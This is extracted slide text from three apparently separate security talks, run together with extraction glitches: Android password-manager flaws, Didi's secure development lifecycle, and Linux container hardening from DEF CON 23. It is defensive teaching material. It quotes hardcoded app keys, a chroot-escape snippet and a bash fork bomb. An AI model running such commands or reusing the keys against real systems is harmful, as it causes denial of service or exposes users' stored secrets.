Logic Design)Flaw • “Forget)Password“)function 17 Logic Design)Flaw • Fire intent,)start DeepLinkActivity 18 Logic Design)Flaw • Settings)->)“RESET)SECURITY)QUESTION“ 19 Attacker Flow 20 Change) Security)Question Reset Master)Password Enter)Verification Code Answer Sec.)Question Attacker has (physical)8device Access ATTACKER Start)Settings Forgot Password Verification Code YES get code from emails on)device Side)Effects • Change)security)question)without8authentication8 • Insert new8data8into)the)database)->) synchronization (no)code)L) • Turn)of)auto8destroy8function)->)brute)forcing 21 22 Get Master)Secret Master)Secret Extraction process • ADB-backup • Mitm attack • Browser8file access • Residue attack Decryption process • Plaintext • Custom8crypto • Hardcoded symmetric keys • Custom8obfuscation 23 1 2 Master)Secret Extraction process • Mitm attack Decryption process • Custom8crypto 24 1 2 User)Authentication 25 username:password success HTTP)+)Custom)Crypto 26 Authentication)Process http – POST)- request seed =)time[ms] key =)random(seed) enc_data =)AES(key,)auth_data) seed =)time[ms] key =)random(seed) dec_data =)AES(key,)auth_data) Body: Header: enc_data encrypted payload ? 27 Authentication)Process http - POST seed =)time[ms] key =)random(seed) enc_data =)AES(key,)auth_data) seed =)time[ms] key =)random(seed) dec_data =)AES(key,)auth_data) seed =)time[ms])– x[ms] key =)random(seed) dec_data =)AES(key,)auth_data) Best)Practices:)Secure)Communication • Android,)correct)ssl* • Stronger,)SSL)(Pinning) • Android)7)supports)pinning)(security))configuration)file) • Use)library)with)pinning)support,)e.g.)OkHttp library) (take)care)of)version) 28 URL url = new URL("https://example.org"); URLConnection urlConnection = url.openConnection(); InputStream in = urlConnection.getInputStream(); … *https://developer.android.com/training/articles/security-ssl.html Master)Secret Extraction process • Browser8file access 29 1 30 md5(“)pinCodeValue“) base64(encr(key,)PASS)) file:///data/data/package.name/shared_prefs/passwd_pref.xml Master)Secret Extraction process • Residue attack 31 1 32 THE ACCOUNTMANAGER THE WHAT ? Android'AccountManger • „This)class)provides)access)to)a)centralized)registry) for)the)user‘s)online)accounts)…“ • SQLITE)Database)for)storing)tokens)or)temp.) Credentials) • API)provides)access)for)Application 33 /data/system/users/0 # ls -l accounts.db -rw-rw---- system system 241664 2017-04-03 10:58 accounts.db “With&this&in&mind,&you&shouldn't*pass*the*user's*actual*password*to& AccountManager.addAccountExplicitly(). Instead,&you&should& store&a&cryptographically&secure*token*that&would&be&of&limited&use&to&an&attacker.& If&your&user&credentials&are&protecting&something&valuable,&you&should&carefully consider&doing&something&similar.” https://developer.android.com/training/id-auth/custom_auth.html Quote)google)developer)(AccountManager) 34 DEMO TIME ! 35 DEMO)TIME)! 36 AccountManager ID email type token accounts.db 37 AccountManager ID email type token com.account email@mail.com secret Target)App account type accounts.db 38 AccountManager ID email type token 1 email@mail.com com.account secret com.account email@mail.com secret Target)App account type installation accounts.db UID8=8123 39 AccountManager ID email type token 1 email@mail.com com.account secret com.account mail1@ma1.com stuff Attacker App account type installation accounts.db UID8=8456 40 AccountManager ID email type token 1 email@mail.com com.account secret accounts.db UID8=8456 COLLISION8!8 UID:123 ¹ UID:456 41 AccountManager ID email type token 1 email@mail.com com.account secret accounts.db UID8=8456 COLLISION8!8 UID:123 ¹ UID:456 uninstall target app com.account 42 AccountManager ID email type token 1 email@mail.com com.account secret accounts.db Not)removed, there is an)app with matching account type com.account 43 AccountManager ID email type token 1 email@mail.com com.account secret accounts.db Attacker app can now access the secret ! com.account Master)Secret Decryption process • Hardcoded symmetric keys • Custom8obfuscation 44 2 Crypto – Do)it right 45 “A)cryptosystem)should)be)secure)even)if)everything) about)the)system,)except)the)key,)is)public)knowledge.”)* *JOURNAL)DES)SCIENCES)MILITAIRES.)Janvier)1883.)LA)CRYPTOGRAPHIE)MILITAIRE. Kerckhoffs's principle Correct encryption 46 master secret (password) cipher-text key)derivation function (e.g.)PBKDF2) AES encryption or decryption Lsdh3ji a32er4o er3owe2 daerw23 Bad)Crypto 47 master secret (password=)mp) AES encryption/)decryption (enc(mp,)d)) Lsdh3ji a32er4o er3owe2 daerw23 static key =)s AES store enc(s,)mp) mp)= mp) cipher-text [0…0])- padding data d Hard-coded keys 48 String = staticinvoke f.b("ydPCPFnpqfPuuBYPzhfGXD38gtUPN2yj", $String); public abstract class LPCommon { //first part of the key protected static String aA = "ldT52Fjsnjdn4390"; //second part of the key protected static String aB = "89y23489h989fFFF"; AES-Key)=)ydPCPFnpqfPuuBYPzhfGXD38gtUPN2yj AES-Key)=)ldT52Fjsnjdn4390 89y23489h989fFFF; Broken Key)Obfuscation 49 master secret (password=)mp) AES random key self-implemented random enc(kr,)mp) obf(kr) obfuscator encryption kr sizeof(kr)=9 9 55 Broken Key)Obfuscation 50 obf(kr) kr Abc2Abc2Abc2 Random)encryption key Obfuscated key obf(kr)8parts kr parts Abc kr[0])+)kr[1] 2 kr[2] Abc kr[3])+)kr[4] 2 kr[5] Abc kr[6])+)kr[7] 2 kr[8] sizeof(kr)=9 sizeof(obf(kr))=12 Scheme: kr[0])+)kr[1])=)kr[3])+)kr[4])=) kr [6])+)kr[7]) and: kr[2])=)kr[5])=)kr[8] Broken Key)Obfuscation 51 obf(kr)8parts kr parts Abc kr[0])+)kr[1] 2 kr[2] Abc kr[3])+)kr[4] 2 kr[5] Abc kr[6])+)kr[7] 2 kr[8] „Bruteforcing“ - simple)„rainbow“)tables - 3)character mapping - 1)character mapping obf(kr)8parts Key8kr[n]8+8kr[n+1] ISF !! ISN !# QUF AA … … Abc kl … … enp zz obf(kr)=Abc2Abc2Abc2 kr =)kl$kl$kl$ Recommendations)(1/2) • Use)Android)KeyStore • Key)derivation)(e.g.)PBKDF28(API),8Conceal8(Open8 Source,8bcrypt,8…) • No)static8keys • Use AES/CBC or)AES/GCM 52 Recommendations (2/2) • Disable backup8flag8(apps)support)backend) synchronization)->)implicit)backup) • If)there)is)a)master)pass)storage)function,)do8not8 store)it)in)plaintext • Do8not8store)the)master8pass8in)the)local8app8 folder,)this)is)not)a)protected)area 53 54 Keeper Lastp 1Pass MyPass Avast F-Sec Keeps. PwMgr Mirsoft Dash Master/PIN X X X X X X X X Hardcoded Key X X X X Sandbox Bypass X X X X X Side)channel X X X X X Subdomain X X X X X X Data leakage X X X Partial) encryption X Broken)sync. X www.sit4.me/pw-manager 55 THIS IS THE END MY FRIEND 56 57 Stephan8Huber Email:)stephan.huber@sit.fraunhofer.de Siegfried8Rasthofer Email:)siegfried.rasthofer@sit.fraunhofer.de Twitter:)@teamsik Website:)www.team-sik.org
滴滴SDL体系建设 范世强 2020.12.17 --滴滴SDL从0-1建设历程 目录 滴滴SDL建设历程概览 02 个人介绍 01 滴滴SDL建设历程详解 03 滴滴SDL现在与未来 04 10余年安全从业经历: • 国舜科技-安全服务 • CNCERT-渗透测试 • 阿里云-云产品安全 • 滴滴出行-SDL负责人 2017年加入滴滴,参与了整个滴滴SDL从0-1的建设过程。 01 个人介绍 02 滴滴SDL建设历程概览 01 滴滴SDL建设历程概览 开发生命周期 滴滴SDL 2017 安全开发技术咨询 设计方案评估 提供安全开发规范 黑盒扫描 三方组件扫描 代码安全评估 SRC漏洞运营 资产库建设 SDL:Security Development Lifecycle 安全开发生命周期 需求 设计 开发 准入 上线 运营 测试 线上安全开发培训 滴滴SDL 2018 滴滴SDL 2019 滴滴SDL 2020 自研代码扫描 提供安全SDK 商用代码扫描 黑盒扫描 安全评估平台化 代码审计手册 漏洞月报 安全评估自动化 自研代码扫描 漏洞月报自动化 03 滴滴SDL建设历程详解 01 滴滴SDL 2017 背景:研发自由上线,SDL无感知;SRC安全漏洞多。 系统上线 触发卡点 安全评估 发布上线 资产梳理 尚未覆盖 绕过卡点 线上域名 线 上 IP 代码仓库 … 域名申请 代码准入 采购软件 ... 重点建设方向: • 建立流程卡点 • 制定上线规范 正向覆盖 反向覆盖 02 滴滴SDL 2018 背景:各项工作通过人肉开展、自动化程度低;过程依赖邮件、钉钉等方式,知识不能沉淀、各项工作无流程闭环。 重点建设方向: • SDL一站式工作平台上线 --数据沉淀、流程线上闭环 --建设漏洞知识库及方案库 • 自研黑盒与测试环境打通 --多渠道流量采集进行扫描 • 商用白盒与部署系统打通 --自研检测规则 • 三方组件检测上线 --打通构建平台拉取组件依赖 03 滴滴SDL 2019 背景:安全评估数量巨大,人效明显不足。 重点建设方向: • 安全评估自动化 --将各个场景的风险提炼成规则引擎 • 自研白盒扫描工具 --基于图搜索技术 • 重新制定开发规范 项目信息输入 (反复沟通) 按要求设计、实现 提交代码及 测试环境 研发人员 SDL安全工程师 输出安全要求、方案 人工评估流程图 输出review结果 整改、上线 业务分析 威胁建模 人工代码 审计 关键信息输入 按要求设计、实现 提交代码 研发人员 SDL平台 输出安全要求、安全方案 自动化评估流程图 输出基线review结果 整改、上线 规则引擎 自研代码检测 引擎 04 滴滴SDL 2020 背景:线上漏洞下降,以逻辑漏洞为主;工具成熟度低、流程体验不足;研发安全意识仍有较大提升空间。 白盒+基线左移 研发安全教育 安全SDK 上线指标大盘 ◼ 目的: 提升覆盖、降低后期 修复成本 ◼ 方法: ① 自研白盒在CI/CD 流水线中左移至构 建阶段; ② 开发/测试阶段自 助检测/修复; ◼ 目的: 提升研发安全编码 ◼ 方法: ① 将安全开发录制成 系列短视频; ② 短视频按需组成课 程包,推送给新研 发; ③ 将短视频形式嵌入 知识库; ◼ 目的: 降低研发修复成本 ◼ 方法: ① 常用安全功能及漏 洞修复标准化 ② 提供安全SDK给研 发使用 ◼ 目的: 提升运营效率 ◼ 方法: ① 将覆盖率、检出率 修复率、漏洞分布 、扫描时长、NPS 等各项指标自动化 计算 ② 在SDL平台提供指 标大盘 05 关于如何做好SDL我的几个观点 ◼ 一开始不要研究多么牛逼的技术和工具,先把覆盖率搞上去。 ◼ 做好资产建设,资产不清楚是很多问题的根源。 ◼ 工具不在多、技术不需要多牛,对标问题是关键。 ◼ 建立有效的指标评价体系,保证运营的有效性。 ◼ 做好漏洞和事件的持续复盘、改进,发生事件不一定是坏事。 ◼ 技术栈的复杂度、代码来源的多样性、互联网业务高频迭代给SDL带来了极大的挑战,把漏洞不是唯一的手段, 也要多依赖安全培训、网络隔离、内外部蓝军、白帽子等其他手段。 04 滴滴SDL的现在与未来 DEV Gitlab 编译构建 产品&组件库 代码准入 代码部署 安全 评估 白盒 扫描 拉取代码 提供产品包 提供依赖的组件 线上运行 黑盒 扫描 QA 采集预发流量 通知扫描引擎 线下测试 黑盒 扫描 线下测试环境 agent流量采集 接入层转发 黑盒 扫描 请求日志 组件 检测 提供组件依赖信息 打包 通知安全评估 白盒 扫描 安全 培训 研发人员信息 OPS 组件 检测 采集组件信息 02 滴滴SDL自动化能力部署 03 滴滴SDL的未来 降发生: 逻辑漏洞检测自动化 工具链+资产库打通 … 安全感: Devsecops体系建设 赋能研发提升效率体验 … 招贤纳士: 欢迎对SDL有兴趣的同学加入我们,共建 滴滴SDL… 微信:fsqsec
Linux Containers: Future or Fantasy? Aaron Grattafiori Technical Director NCC Group (aka iSEC Partners/Matasano Security/Intrepidus Group) DEF CON 23 Infosec, pentesting, Neg9/CTF iSEC Partners for 5.5 years NCC Group for 0.1 years Hacking Samsung Smart TVs @ BH USA 2013, Toorcon, etc Macs in the age of the APT @ BH USA 2011, Source, etc 2015 NCC Group 2 whoami These slides are not intended to be consumed without the corresponding presentation or whitepaper. The information contained within is designed for presenting and not 100% completeness with regards to risks, recommendations, findings, etc. 2015 NCC Group - INTERNAL 3 Disclaimer 2015 NCC Group 4 whoami 2015 NCC Group 5 Story One: The Server Bob’s Ruby on Rails app gets popped or his SQL database server is compromised or his Wordpress plugin gives RCE or …. He wants to add security... But how? 2015 NCC Group 6 Once Upon a Time OLD The tried and true still used today Broken if you have root 2015 NCC Group 7 Chroot ? mkdir(“ncc"); chroot(“ncc"); chdir("../..");  oh no… chroot("."); 2015 NCC Group 8 Chroot  2015 NCC Group 9 SELinux ? NSA made it Complex type system for MLS systems Good support on RHEL 2015 NCC Group 10 SELinux ? Complexity Linus Torvalds problem The setenforce 0 problem Kernel enforces it: Kernel gotta kernel 2015 NCC Group 11 SELinux (and other MAC)  Well you’ve protected the kernel, apps and helped prevention memory corruption and hardened against other attacks but… 2015 NCC Group 12 OK, No MAC but grsecurity! 2015 NCC Group 13 Full Virtual Machines? QEMU, KVM or ESX escapes Recent Xen/QEMU updates anyone? VM for single process? Nope. 2015 NCC Group 14 Full Virtual Machines  2015 NCC Group 15 Story Two: The Client “Gulenn” talks to a potential source named “citizenfour” He can’t use a Chromebook because he is paranoid of Google 2015 NCC Group 16 Once Upon a Time “Malware is just for Windows” “OSX sucks, it’s insecure” Linox is like… super sakure right? 2015 NCC Group 17 Hey, just use Linux! He’s one webkit or gekco bug away from a TBB compromise. What app sandboxes? Pidgin and libpurple don’t have a great track record LiveCDs are stale code by definition 2015 NCC Group 18 aaaaannnnddd broken… 2015 NCC Group 19 Story Three: The Embedded Margaret is in charge of embedded security at D-LINK, Belkin, <insert IoT company> She wants to add isolation between the web app, wpa_supplicant and DLNA stack Tired of having CSRF-able arbitrary code execution via buggy input validation 2015 NCC Group 20 Once Upon a Time Everything runs as root No security is added (because $$$) You can’t easily virtualize or segment ARM/MIPS within a router, but is there nothing we can do to improve IoT? 2015 NCC Group 21 Margret isn’t alone! 2015 NCC Group 22 What do these stories have in common? Attack surface matters almost more than anything else Sandboxes and containers at least let us pick our battles: they should be the rule not the exception ( Props to Google Chrome Browser, Adobe Reader X, Apple Seatbelt, Google ChromeOS, etc) How can we work to improve server, desktop and embedded security for Linux ? 2015 NCC Group 23 What do these stories have in common? 2015 NCC Group 24 We have to try something new Paul Smecker: They exited out the front door. They had no idea what they were in for. Now they're staring at six men with guns drawn. It was a fucking ambush. NCC Group - INTERNAL 2015 25 Paul Smecker: This was a fucking bomb dropping on Beaver Cleaverville. For a few seconds, this place was Armageddon! NCC Group - INTERNAL 2015 26 Officer Greenly: What if it was just one guy with six guns? NCC Group - INTERNAL 2015 27 Paul Smecker: Why don't you let me do the thinking, huh, genius? NCC Group - INTERNAL 2015 28 But Greenly was right… it was “il Duce” NCC Group - INTERNAL 2015 29 2015 NCC Group 30 What if it wasn’t one cpu with multiple kernels, but one kernel with multiple userlands? 2015 NCC Group 31 OpenVZ Linux Vservers FreeBSD Jails OpenBSD/NetBSD Sysjail Solaris Zones HP UX Containers AIX Workload Partitions Fundamentally less secure than hardware virtualization 2015 NCC Group 32 A little bit about OS Virtualization Hardware virtualization creates software emulation for pretty much everything Software or OS virtualization partitions a single kernel and attempts to restrict or control access to hardware 2015 NCC Group 33 OS vs Hardware Virtualization Hardware virtualization is even fundamentally less secure than physically different hardware… (surrounded by guys with guns and fences) 2015 NCC Group 34 But we don’t want to depend on a single method for security … 2015 NCC Group 35 Namespaces 2015 NCC Group 36 Namespaces http://www.cs.bell-labs.com/sys/doc/names.html Plan9 2015 NCC Group 37 Namespaces Linux Kernel MOUNT NET UTS USER PID clone(2) set_ns(2) unshare(2) 2015 NCC Group 38 It all starts with a CLONE(2) “Kernel Execution Context” CLONE_NEWNS: Added in 2.4.19 kernel Per user / via PAM Per process view of files, disks, NFS 2015 NCC Group 39 MOUNT Namespace CLONE_NEWIPC: Added in 2.6.19 “System 4 IPC objects” 2015 NCC Group 40 IPC Namespace CLONE_NEWUTS: Added in 2.6.19 uname(2), setdomainname(2), sethostname(2) 2015 NCC Group 41 UTS Namespace CLONE_NEWPID: Added in 2.6.24 Process IDs start at 1 Can be nested 2015 NCC Group 42 PID Namespace 2015 NCC Group 43 PID NS example $ lxc-create –t busybox –n foo ; lxc-start –n foo $ lxc-attach -n foo -- ps PID USER COMMAND 1 root init 5 root /bin/sh 10 root ps 2015 NCC Group 44 CLONE_NEWNET: Added in 2.6.24 Separate network device, IP, MAC, routing table, firewall 2015 NCC Group 45 NETWORK Namespace CLONE_NEWUSER: Added in 2.6.23 but finished 3.8 Important for actually securing containers … also a high risk area of the kernel :/ 2015 NCC Group 46 USER Namespace $ lxc-attach -n foo -- sh BusyBox v1.21.1 (Ubuntu 1:1.21.0-1ubuntu1) built-in shell (ash) … $ id uid=0(root) gid=0(root) $ sleep 1337 2015 NCC Group 47 USER NS example 100000 17110 0.0 0.0 2184 260 pts/14 S+ 12:03 0:00 sleep 1337 2015 NCC Group 48 Capabilities 2015 NCC Group 49 root CAP_NET_ADMIN CAP_SYS_PCAP CAP_SYS_MODULE CAP_SYS_RAWIO CAP_MKNOD CAP_NET_BIND_SERVICE CAP_SYSLOG CAP_NET_RAW CAP_DAC_READ_SEARCH CAP_MAC_ADMIN CAP_SYS_PTRACE CAP_SETGID CAP_SETUID CAP_SYS_BOOT CAP_SYS_TIME CAP_SYS_CHROOT CAP_AUDIT_WRITE CAP_WAKE_ALARM CAP_SYS_ADMIN Pros: Kernel devs adding them  Cons: Busy (and lazy) kernel devs  Result: Semi-working capabilities model! 2015 NCC Group 50 Capabilities CAP_NET_ADMIN CAP_NET_RAW CAP_NET_BIND_SERVICE CAP_SYS_RESOURCE CAP_SYS_PTRACE CAP_SYS_RAWIO CAP_KILL 2015 NCC Group 51 Examples of Capabilities What should be dropped ? 2015 NCC Group 52 Dropping Capabilities Everything! What if I leave just “CAP_FOO” enabled? It depends… $ ls –l /bin/ping -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping 2015 NCC Group 53 Fixing ping $ cp /bin/ping /tmp ; ls –l /tmp/ping -rwxr-xr-x 1 root root 44168 Mar 18 11:02 /tmp/ping $ /tmp/ping localhost ping: icmp open socket: Operation not permitted $ sudo setcap cap_net_raw=p /tmp/ping 2015 NCC Group 54 Fixing ping $ getcap /tmp/ping /tmp/ping = cap_net_raw+p $ /tmp/ping localhost PING localhost ( 56(84) bytes of data 64 bytes from localhost ( icmp_seq ... SYS_CHROOT NET_RAW SYS_MODULE SYS_RAWIO NET_ADMIN SYS_PTRACE MAC_ADMIN CAP_MKNOD MAC_OVERRIDE DAC_READ_SEARCH 2015 NCC Group 55 Some Dangerous Capabilities * Perform a range of system administration operations including: quotactl(2), mount(2), umount(2), swapon(2), swapoff(2), sethostname(2), and setdomain‐ name(2); * perform privileged syslog(2) operations (since Linux 2.6.37, CAP_SYSLOG should be used to permit such operations); * perform VM86_REQUEST_IRQ vm86(2) command; * perform IPC_SET and IPC_RMID operations on arbitrary System V IPC objects; * perform operations on trusted and security Extended Attributes (see attr(5)); * use lookup_dcookie(2); * use ioprio_set(2) to assign IOPRIO_CLASS_RT and (before Linux 2.6.25) IOPRIO_CLASS_IDLE I/O scheduling classes; * forge UID when passing socket credentials; * perform administrative operations on many device drivers. 2015 NCC Group 56 CAP_SYS_ADMIN == root * exceed /proc/sys/fs/file-max, the system-wide limit on the number of open files, in system calls that open files (e.g., accept(2), execve(2), open(2), pipe(2)); * employ CLONE_* flags that create new namespaces with clone(2) and unshare(2); * call perf_event_open(2); * access privileged perf event information; * call setns(2); * call fanotify_init(2); * perform KEYCTL_CHOWN and KEYCTL_SETPERM keyctl(2) operations; * perform madvise(2) MADV_HWPOISON operation; * employ the TIOCSTI ioctl(2) to insert characters into the input queue of a ter‐ minal other than the caller's controlling terminal. * employ the obsolete nfsservctl(2) system call; * employ the obsolete bdflush(2) system call; * perform various privileged block-device ioctl(2) operations; * perform various privileged filesystem ioctl(2) operations; See False Boundaries and Arbitrary Code Execution post by Spender https://forums.grsecurity.net/viewtopic.php?f=7&t=2522 2015 NCC Group 57 Control groups Hierarchical and inheritable Controls different subsystems (Dev, CPU, Mem, I/O, Network) ulimit on steroids 2015 NCC Group 58 cgroups Controlling access to resources based on subgroups: devices, CPU, I/O, Mem, … Filling some gaps of namespaces 2015 NCC Group 59 cgroups Controlling cgroups is typically performed via a virtual filesystem: /sys/fs/cgroup Main configuration (besides container configs): /etc/cgrules.conf, /etc/cgconfig.conf 2015 NCC Group 60 cgroups cgexec cgmanager Container platforms make it easy 2015 NCC Group 61 cgroups 2015 NCC Group 62 Putting that all together… Namespaces logically isolate kernel elements Capabilities help enforce namespaces and reduce undesired privileges Cgroups limit hardware resources 2015 NCC Group 63 Putting it all together… Linux Containers Better than chroot! Still not virtualization… 2015 NCC Group 64 Enter: Containers (LXC, Docker, CoreOS rkt, Heroku, Flockport, Kubernets, Joyant, etc) Beyond ro, nodev, noexec, nosuid Bind, Overlay, Union, CoW, Versioning, even sshfs 2015 NCC Group 65 Mount options Self-hosted PaaS systems Amazon EC2 Google App Engine Rackspace, Heroku 2015 NCC Group 66 Namespaces, Capabilities and Cgroups: where are they now on Linux servers? ChromeOS and the Chrome browser Limited use in Android Some Linux distros Sandboxing tools: minijail, mbox 2015 NCC Group 67 Namespaces, Capabilities and Cgroups: where are they now on Linux clients? 2015 NCC Group 68 LinuX Containers: LXC lxc.rootfs = /var/lib/lxc/defcon-ctf/rootfs lxc.utsname = isec lxc.start.auto = 1 lxc.mount.entry = /lib lib none ro,bind,nodev 0 0 lxc.mount.entry = /lib64 lib64 none ro,bind,noexec 0 0 2015 NCC Group 69 LXC: Template: Basics lxc.cgroup.tasks.limit = 256 lxc.cgroup.devices.deny = a lxc.cgroup.devices.allow = b 9:0 r lxc.cgroup.memory.limit_in_bytes = 4000000 2015 NCC Group 70 LXC: Template: Cgroups lxc.cap.keep = sys_time sys_nice lxc.aa_profile = lxc-container-default lxc.seccomp = /path/to/seccomp.rules 2015 NCC Group 71 LXC: Template: Other Security 2015 NCC Group 72 Recent Advancements Non-root users can now create/start containers and be “root” inside the container Weird things can obviously happen More work and auditing to be done 2015 NCC Group 73 Unprivileged Containers There are 190 syscalls in Linux 2.2 There are 337 syscalls in Linux 2.6 There are 340 syscalls in Linux 4.1 How many does your app really need? 2015 NCC Group 74 What about that kernel attack surface? SECure COMPuting Filtering the kernel (yet again) “System call filtering isn't a sandbox. It provides a clearly defined mechanism for minimizing the exposed kernel surface.” – Will @redpig Drewry, Google 2015 NCC Group 75 Seccomp-bpf Syscall arguments can also be filtered (mostly) Large number of filters = performance hit Only really supports x86 and x86_64 (for now) You’ll need LXC, Minijail or Mbox (Docker /contrib now, release branch soon (1.8?)) 2015 NCC Group 76 Seccomp-bpf Seccomp-bpf prctl(2) – operations on a process PR_SET_SECCOMP: SECCOMP_MODE_STRICT (old) SECCOMP_MODE_FILTER (new hotness) NCC Group - INTERNAL 2015 77 Seccomp-bpf struct sock_filter filter[] = { BPF_STMT(BPF_LD+BPF_W+BPF_ABS, syscall_nr), BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, __NR_ptrace, 1, 0), BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW), BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL) }; struct sock_fprog prog = {(unsigned short) (sizeof(filter) / sizeof(filter[0])), filter }; prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0); prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog); NCC Group - INTERNAL 2015 78 Berkeley Packet Filter # tcpdump –p –nqi wlan0 –d ‘tcp and port 80’ (000) ldh [12] (001) jeq #0x86dd jt 2 jf 8 (002) ldb [20] (003) jeq #0x6 jt 4 jf 19 (004) ldh [54] (005) jeq #0x50 jt 18 jf 6 (006) ldh [56] (007) jeq #0x50 jt 18 jf 19 (008) jeq #0x800 jt 9 jf 19 (009) ldb [23] . . . . . NCC Group - INTERNAL 2015 79 ChromeOS / Google Chrome Firejail OpenSSH Capsicum Tor Mbox vsftpd BIND LXC QEMU Opera Browser Docker (/contrib) 2015 NCC Group 80 Seccomp-bpf: where Docker CoreOS Flockport Sandstorm.io RancherOS … and many more 2015 NCC Group 81 So who is implementing and supporting containers? Heroku (ish) Joyent Amazon VMware Google/Kubernets 2015 NCC Group 82 Lets talk about the big two 2015 NCC Group 83 Packaging and deployment focused – one app per container Devs and Ops, DevOps, DevCyberOps, DevSecOps, BlackOps, etc Developing PaaS Makes it easy 2015 NCC Group 84 What is the “big deal” libcontainer, libchan, libswarm, etc Written in go REST API Running docker daemon (as root) 2015 NCC Group 85 So Docker is just LXC? Nope. Docker images: $ docker run --name mynginx –v \ /opt/content:/usr/share/nginx/html:ro -d nginx Docker Hub: $ sudo docker run ubuntu:14.04 /bin/echo 'Hello world’ Hello world Orchestration, Communication, Management 2015 NCC Group 86 Docker Ecosystem 2015 NCC Group 87 Minimal OS for hosting containers Launching the rkt and app container spec App container spec picked up by VMware Photon Separation from Docker and LXC 2015 NCC Group 88 CoreOS Takes some of the configuration away FreeBSD::OSX  LXC::Docker Additional packaged tools | features 2015 NCC Group 89 Why Docker, Rocket, etc? LXC: You want to run a containerized OS or single app. Hard mode with the most flexibility. Docker: You want to run a single app per container. Easy mode with some costs. CoreOS: You want to host Docker containers or try and use rkt. So much bleeding it’s rated R. 2015 NCC Group 90 Why Docker, Rocket, etc? 2015 NCC Group 91 Going on the attack Container to other container Container to itself Container to host Container to support infrastructure Container to local network Container to … 2015 NCC Group - INTERNAL 92 Lets think about this…. 2015 NCC Group 93 Starting at the top 2015 NCC Group 94 Starting at the top Lots of drivers, old code, weird filesystems, old syscalls, platform specific problems strange or unused network protocols 2015 NCC Group 95 Kernel who? If you don’t drop the right ones: game over Not dropping caps also allows kernel code exec… CAP_NET_ADMIN (CVE-2013-4588, CVE-2011- 2517, CVE-2011-1019, …) 2015 NCC Group 96 Not…. Dropping caps Speaking of dropping capabilities, a Docker shocker: CAP_DAC_READ_SEARCH “Invoke open_by_handle_at(2)” Brute force the inode of /etc/shadow Props to Stealth aka Sebastian Kramer 2015 NCC Group 97 Not…. Dropping caps Without a MAC system, capability dropping and the user namespace are your only line of defense 2015 NCC Group 98 Not…. Dropping caps Procfs: /proc/kcore, /proc/sys/modprobe, /proc/sys/kernel/sysrq Sysfs: /sys Cgroups does not limit: mknod Kernel ring buffer: dmesg Network access: br0 Unintended devfs: /dev, /dev/shm 2015 NCC Group 99 Not…. Limiting access Forkbomb! :(){ :|:& };: Memory, disk, entropy… 2015 NCC Group 100 Not…. Limiting resources When was the last time you updated OpenSSL in your Docker container? How do you deal with updates in place if apt-get upgrade is a “no-no”? 2015 NCC Group 101 When good containers go stale “The flawed assumption of modern computing environments” Eggs in one (kernel) basket AppArmor does a decent job 2015 NCC Group 102 Lack of MAC (Mandatory Access Controls) Bad defaults: Capability dropping, networking, Unprivileged containers finished-ish A few security fixes have lagged :/ 2015 NCC Group 103 LXC Weaknesses 2015 NCC Group 104 Capability dropping: a shocker Root daemon plus root to use it Weak REST API authentication defaults Docker “github all the way down” 2015 NCC Group 105 Docker Weaknesses Does not drop all capabilities by default, drops all except “those needed” (still includes some dangerous capabilities CAP_NET_RAW, CAP_FOWNER, CAP_MKNOD, …) Docker binds container port maps to all interfaces by default Base images are huge… apt-get is hungry Docker networking defaults allow cross-container networking and access to Docker host 2015 NCC Group 106 Docker Weaknesses Giving low rights users access to Docker means giving them root on the Docker host Currently missing support for key security features: seccomp-bpf and the User Namespace Exposing the socket/REST API inside a container for introspection <- don’t do that 2015 NCC Group 107 Docker Weaknesses Docker Weaknesses About that lack of User namespace….: Hi all, I'm a maintainer of Docker. As others already indicated this doesn't work on 1.0. But it could have. Please remember that at this time, we don't claim Docker out-of- the-box is suitable for containing untrusted programs with root privileges. So if you're thinking "pfew, good thing we upgraded to 1.0 or we were toast", you need to change your underlying configuration now. Add apparmor or selinux containment, map trust groups to separate machines, or ideally don't grant root access to the application. Docker will soon support user namespaces, which is a great additional security layer but also not a silver bullet! When we feel comfortable saying that Docker out-of-the-box can safely contain untrusted uid0 programs, we will say so clearly. NCC Group - INTERNAL 2015 108 Posted one year ago :/ 2015 NCC Group - INTERNAL 109 2015 NCC Group 110 Rocket (rkt) is extremely new No root daemon but rkt still requires root… 2015 NCC Group 111 CoreOS “rkt” Weaknesses 2015 NCC Group 112 Rocket does not drop many dangerous Capabilities or support the User namespace CoreOS “rkt” Weaknesses 2015 NCC Group 113 Seccomp ? Nope. Apparmor ? Nope. SELinux? Kinda. Root inside container? Yep. /proc, /proc/sys limits? Nope. CoreOS “rkt” Weaknesses 2015 NCC Group 114 The Dream 2015 NCC Group 115 The Implementation 2015 NCC Group 116 Open Container Project (OCP) Robert 'Bob' Morton: At Security Concepts, we're projecting the end of crime in Old Detroit within forty days. There's a new guy in town. His name is RoboCop. 2015 NCC Group 117 Open Container Initiative (OCI?) Working on a joint specification (OCF) for containers Launched runc. An OCF implementation using libcontainer from Docker. Unfortunately still not working on RoboCop. 2015 NCC Group 118 That all sounds bad/easy to mess up … and how to make it better 2015 NCC Group 119 Recommendations 2015 NCC Group 120 Grsecurity/PaX is the only serious kernel hardening patchset. Just do it Typical sysctl hardening Minimal kernel modules 2015 NCC Group 121 Kernel Hardening Gotta drop them all! Design for the smallest set Assume the worst 2015 NCC Group 122 Dropping all the Capabilities AppArmor Grsecurity RBAC SMACK SELinux 2015 NCC Group 123 Adding a MAC Layer Defaults to enabled for LXC and Docker! Can be nested! Path based, but hey it works 2015 NCC Group 124 AppArmor Don’t allow access to docker user or group Don’t run privileged or root containers Drop additional capabilities Upgrade to 1.8 when released (or use /contrib now) which has seccomp-bpf and User namespace support, w00t! Checkout docker-bench-security and other solid work by Docker Security team Use small base images 2015 NCC Group 125 Docker Specific Hardening Use a whitelist if you can but a blacklist will do OK Docker is exploring a “high”, “med”, “low” default for 1.8+ but what is really needed is profiles for each Containerized app. 2015 NCC Group 126 Seccomp-bpf Mount security, Extended filesystem attributes, Access controls, Permissions, Logging, Firewalls, Auditing, Hardened Toolchain, Safe languages, Attack surface reduction, Least privileges, Least Access, Resource Limits, 2FA, Reduced Complexity, Pentesting 2015 NCC Group 127 Normal System Hardening Listening on “all interfaces” (includes docker0/lxcbr0) Containers are great for network auditing/traceflow! 2015 NCC Group 128 Network Hardening 2015 NCC Group 129 Trust A HYPERVISOR/HARDWARE Linux 